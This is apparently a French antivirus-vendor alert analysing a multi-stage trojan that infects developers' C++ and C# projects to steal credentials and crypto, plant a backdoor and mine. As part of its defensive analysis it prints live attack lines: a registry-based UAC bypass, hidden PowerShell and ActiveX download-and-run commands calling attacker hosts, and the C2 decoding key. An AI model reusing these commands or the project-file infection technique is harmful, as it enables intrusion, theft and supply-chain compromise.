La cible : les développeurs. Un nouveau cheval de Troie s’attaque aux chaînes d’approvisionnement et provoque des dommages combinés aux ordinateurs infectés.

Hot news | Toutes les actualités | Alertes virales

Les spécialistes du laboratoire antivirus ont analysé un nouveau cheval de Troie. Il s'agit d'une menace de type supply chain attack, ciblant la chaîne d'approvisionnement logicielle. Ce logiciel malveillant se distingue notamment par son orientation vers les projets développés dans les langages de programmation C++ et C#. Une autre caractéristique est sa dangerosité élevée. Ce cheval de Troie combine plusieurs facteurs de dommage, exécutant simultanément plusieurs fonctions : voleur de cryptomonnaie, pirate informatique, porte dérobée, mineur de cryptomonnaie et source d’infection de fichiers.

Les premiers cas de propagation du cheval de Troie ont été enregistrés au dernier trimestre 2025 Depuis, il a constamment été modifié par ses développeurs. Il se propage principalement sur Internet via des fichiers .exe et Python infectés. Le processus d'infection comporte plusieurs étapes ; examinons chaque étape et son objectif une par une.

Étape 1. Trojan.DownLoader49.35384

Les experts de Doctor Web ont découvert de nombreuses applications légitimes infectées présentant une structure similaire. Un objet global est ajouté au fichier exécutable d'origine, et l'application piégée démarre son exécution en accédant aux API système via la méthode PEB walking. Ensuite, la fonction initterm standard parcourt la table des pointeurs de fonction et les initialise, où l'une de ces fonctions est malveillante et exécute la commande PowerShell. Dans certaines versions du cheval de Troie, cette charge utile est stockée sous forme chiffrée.

Lancement via initterm

La commande PowerShell télécharge et exécute le fichier malveillant Trojan.DownLoader49.35687, ce qui signifie la deuxième étape.

Commande malveillante PowerShell

En plus des fichiers exécutables, des fichiers en langage Python (Python.Downloader.255) ont été trouvés. Dans ceux-ci, le même code malveillant était crypté à l'aide du mécanisme de cryptage symétrique Fernet. Il est caché derrière un simple obscurcissement – de nombreux espaces sur la première ligne. Dans ce cas, l'exécution se déroule également en plusieurs étapes.

Fichiers malveillants Python

Étape 2. Trojan.DownLoader49.35687

À ce stade, Trojan.DownLoader49.35687 effectue une vérification de son lancement dans le bac à sable. De plus, il crée un objet de synchronisation mutex nommé Global\PFNMX(valeur fixe). Un exemple d'un tel objet : \Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008. Le cheval de Troie vérifie ainsi si une autre copie a déjà été lancée sur l'ordinateur.

A la deuxième étape, le Trojan tente d'obtenir les adresses du serveur de commande et de contrôle (C2) via les dépôts GitHub publics et la plateforme de jeux Steam. Les attaquants y laissent des noms de domaine, que le cheval de Troie lit et utilise comme URL pour télécharger la troisième étape : le cheval de Troie BackDoor.Siggen2.5906.

Les comptes Steam créés par les attaquants contiennent le nom de domaine en clair.

Compte Steam avec le domaine C2

Sur GitHub, les attaquants ont enregistré l'adresse de domaine C2 chiffrée sous forme de fichier raw : raw[.]githubusercontent[.]com/XxXloverXxX/rustflare/refs/heads/main/crates/engine. Le cheval de Troie télécharge ce fichier et le déchiffre d'abord via Base64 puis en utilisant l'opération XOR avec la clé ZwFlushKey.

Domaines cryptés

Après avoir téléchargé l'étape suivante, Trojan.DownLoader49.35687 l'injecte dans le processus de l'un des 41 fichiers exécutables prédéfinis de C:\Windows\System32.

L'adresse du domaine C2 avec lequel la communication a été établie est ajoutée aux chaînes intégrées dans le cheval de Troie et transmise à l'étape suivante via le canal nommé pipe\VccFramework.

Étape 3. BackDoor.Siggen2.5906

C’est à cette étape que se déroule l’activité malveillante principale. BackDoor.Siggen2.5906 crée un objet de synchronisation mutex avec un nom fixe de la forme Global\PFNX_Side(valeur fixe). Ensuite, via un canal créé précédemment, le cheval de Troie reçoit des données de la deuxième étape, à partir desquelles il extrait les identifiants du cheval de Troie et le domaine C2 avec lequel BackDoor.Siggen2.5906 communiquera.

Pour prendre pied dans le système, le cheval de Troie télécharge le fichier « bungee.boo », qui remplit les fonctions de l'étape 2 - Trojan.DownLoader49.35687, et remplace les fichiers DLL par celui-ci :

  • «profapi.dll» de l'application Discord,
  • «domain_actions.dll» dans le dossier «Domain Actions» et «well_known_domains.dll» dans le dossier «Well Known Domains» de l'application Microsoft Edge,
  • «C:\Windows\omadmapi.dll».

De plus, BackDoor.Siggen2.5906 peut modifier le registre système Windows de telle sorte que du code malveillant soit exécuté lors de l'ouverture de fichiers archivés à l'aide de WinRar.exe.

Pour fonctionner avec les privilèges d'administrateur, le cheval de Troie utilise une technique de contournement du contrôle de compte d'utilisateur (UAC). Le logiciel malveillant génère un fichier .vbs dont le nom est composé de chiffres aléatoires et qui contient une commande à exécuter avec les privilèges d'administrateur. Ensuite, les commandes suivantes sont exécutées via cmd.exe :

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe
%APPDATA%\Microsoft\369059.vbs" /f
reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
c start /B ComputerDefaults.exe

Le cheval de Troie met ensuite en œuvre cinq fonctions malveillantes : stealer, clipper, porte dérobée, minage de cryptomonnaie et source d'infection de fichiers.

Stealer

Le cheval de Troie est capable de voler diverses informations :

  • les jetons Discord, qui permettent d’accéder à d’autres comptes sans saisir d’identifiant ni de mot de passe ;
  • les mots de passe et les cookies de Chrome, Edge, Opera, Brave, Yandex et autres navigateurs. A part les techniques d'extraction de données classiques, il peut utiliser le fichier CCCWF.tmp (Trojan.PWS.Siggen5.33623). Il s'intègre au navigateur, puis lit les mots de passe et les enregistre dans des fichiers texte.
  • dossiers Telegram Desktop ;
  • dossiers du portefeuille crypto Exodus.

Outre le vol des dossiers Exodus, le cheval de Troie modifie également le portefeuille crypto. Pour ce faire, il localise le fichier app.asar et le remplace par une copie téléchargée depuis l'URL balista[.]lol/Stb/PokerFace/RTApp[.]txt à l'aide de curl. La version remplacée dans index.js (Trojan.Siggen32.44702) contient la fonction unlock() qui, lorsqu'elle est exécutée, envoie des phrases mnémoniques du portefeuille au serveur des attaquants.

Fichier index.js remplacé

Clipper

Une fonction particulièrement dangereuse du cheval de Troie. Le logiciel malveillant surveille en permanence le presse-papiers de l'utilisateur, à la recherche d'informations bancaires, et les envoie au serveur des attaquants. Il remplace également les adresses des portefeuilles de cryptomonnaies par de fausses adresses reçues du serveur de commande et de contrôle (C2).

Porte dérobée

Les fonctionnalités du cheval de Troie permettent aux attaquants de contrôler à distance un PC infecté à l'aide des commandes suivantes :

excTélécharger le fichier depuis une URL avec curl et l'exécuter
RVRSlancer Reverse Proxy
RUNCMDexécuter la commande via cmd
GETFILEtélécharger le contenu d'un fichier spécifique vers le serveur de commande
LISTDIRenvoyer une liste de fichiers d'un répertoire spécifique vers le serveur de commande
TROLLexécutez une commande pour troller l'utilisateur. Options disponibles : earrape, scary_sound, rickroll, mute_audio, jumpscare_screamer etc.

Miner

Le cheval de Troie utilise curl pour télécharger du serveur et exécuter le fichier https://files[.]catbox[.]moe/lvh9j3[.]bin — Trojan.Packed2.50953. Sa structure et ses actions sont similaires à celles de l'étape 2, mais au lieu de BackDoor.Siggen2.5906, il télécharge et installe Trojan.BtcMine.3956. Ce miner ne se lance qu'après une période d'inactivité de l'utilisateur. Ce malware utilise les outils open source XMRig, T-Rex et TeamRedMiner.

Contamination de fichiers

La principale caractéristique de ce cheval de Troie est sa capacité à infecter des fichiers puis à se propager de manière autonome. Liste des fichiers infectés :

  • imgui_impl_win32.cpp,
  • .suo,
  • .exe,
  • winnetwk.h (Windows SDK),
  • .vcxproj et .csproj.

Pour déterminer les chemins d'accès aux fichiers susceptibles d'être infectés, le cheval de Troie analyse des disques et exécute une commande. Exemple pour le lecteur A://

dir /a /s /b A:\*imgui_impl_win32.cpp A:\*.suo A:\*.exe A:\*.vcxproj A:\*.csproj > %ALLUSERSPROFILE%\ADat.bin3290.

Les attaquants comptent sur le fait que les développeurs publieront leurs projets contenant du code malveillant dans le domaine public. Les autres développeurs qui créent, compilent ou modifient le projet infecteront automatiquement leurs ordinateurs à cause des fichiers .suo, .vcxproj et .csproj, et les utilisateurs ordinaires pourront exécuter des exécutables infectés créés à l'aide d'outils de développement compromis.

Fichier imgui_impl_win32.cpp. Trojan.Loader.3129

Le fichier imgui_impl_win32.cpp fait partie de la populaire bibliothèque Dear ImGui, qui est resposable de l'interface graphique pour le langage de programmation C++. Le cheval de Troie injecte deux chaînes dans le fichier : la première contient une charge utile, la seconde la lance.

Ligne de code contenant la charge utile

Ligne de code qui exécute la charge utile

Résultat - commande


start /min cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://exo-api[.]tf/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt' -OutFile $env:APPDATA\BK879002.exe; Start-Process -FilePath $env:APPDATA\BK879002.exe -WindowStyle Hidden }" 

La bibliothèque est donc infectée, et toute application C++ créée par l'utilisateur contiendra du code malveillant. Lorsque ces applications seront partagées ou téléchargées, l'infection se propagera.

Fichiers .suo. Trojan.Loader.3138

Il s'agit d'une extension de fichier pour l'environnement de développement Microsoft Visual Studio. Ces fichiers stockent les paramètres utilisateur de projets spécifiques. Le cheval de Troie remplace le fichier original par un fichier infecté obtenu depuis un serveur de commande et de contrôle (C2).

Fichier contaminé

Par conséquent, un code malveillant est exécuté lorsque le projet est ouvert dans Visual Studio :


javascript:new ActiveXObject('WScript.Shell').Run('cmd /b /c curl -o \"C:\\ProgramData\\S47LY.exe\" \"https://pee-files[.]nl/Stb/Retev.php?bl=1BRn03AWabt6xvxWdzDSW01.txt\" && start \"\" \"C:\\ProgramData\\S47LY.exe\"', 0, false);close();

Fichiers winnetwk.h. Trojan.Loader.3184

Le kit de développement logiciel (SDK) Windows est l'outil officiel de Microsoft pour la création d'applications pour le système d'exploitation Windows.

Le cheval de Troie utilise le registre pour localiser le dossier d'installation du SDK Windows. Le fichier winnetwk.h, responsable de la gestion des ressources réseau, est recherché dans ce dossier. Du code malveillant y est ensuite ajouté.

Fichier contaminé winnetwk.h

Après cela, tous les programmes créés à l'aide de winnetwk.h contiendront du code malveillant qui déclenchera la deuxième étape.

Fichiers .exe

Le cheval de Troie recherche les fichiers .exe appropriés et y injecte des fonctions d'initialisation de l'API et de lancement initterm. Puis, le fichier commence à fonctionner comme Trojan.DownLoader49.35384, également appelé étape 1.

Fichiers .vcxproj (Trojan.Loader.3128, Trojan.Loader.3127) et .csproj (Trojan.Loader.3126)

Il s'agit de fichiers de projet Visual Studio écrits en C++ et C#. La commande PreBuildEvent s'y ajoute, et elle s'exécute avant chaque compilation du projet. Les versions précédentes du cheval de Troie intégraient un code similaire à celui de la première étape.

Version précédente du code

Dans les versions plus récentes, le code est devenu plus complexe et des mécanismes d'obfuscation supplémentaires ont été ajoutés.

Nouvelle version du code

Une des étapes d'exécution du cheval de Troie Trojan.Loader.3128

La commande malveillante assure l'enregistrement du fichier .vbs malveillant qui, à son tour, lance la charge utile (payload) PowerShell. Le cheval de Troie effectue une requête aux URL suivantes :

  • youtu.be/akoxddx6lgc,
  • steamcommunity.com/profiles/76561198737324192.

Ces adresses stockent une autre URL, chiffrée en base64.

Compte YouTube avec URL chiffrée

Après le déchiffrement, le cheval de Troie obtient un domaine C2 auquel il accède pour exécuter une charge utile similaire à celle de la deuxième étape.

La description du fonctionnement du cheval de Troie indique qu'il représente une menace accrue en raison de la combinaison de plusieurs fonctions malveillantes. Pour prévenir l'infection de votre ordinateur et la propagation du cheval de Troie, nous vous recommandons de mettre à jour régulièrement les bases de données de votre antivirus et d'analyser tous les fichiers téléchargés depuis Internet. Les utilisateurs de Dr.Web Security Space et de Dr.Web Desktop Security Suite n‘ont pas à s'inquiéter : le cheval de Troie est détecté et supprimé efficacement par le logiciel antivirus Dr.Web. Les fichiers tels que .vcxproj, .csproj et imgui peuvent être désinfectés, et le code malveillant qu'ils contiennent sera supprimé.

0
Dernières news Toutes les news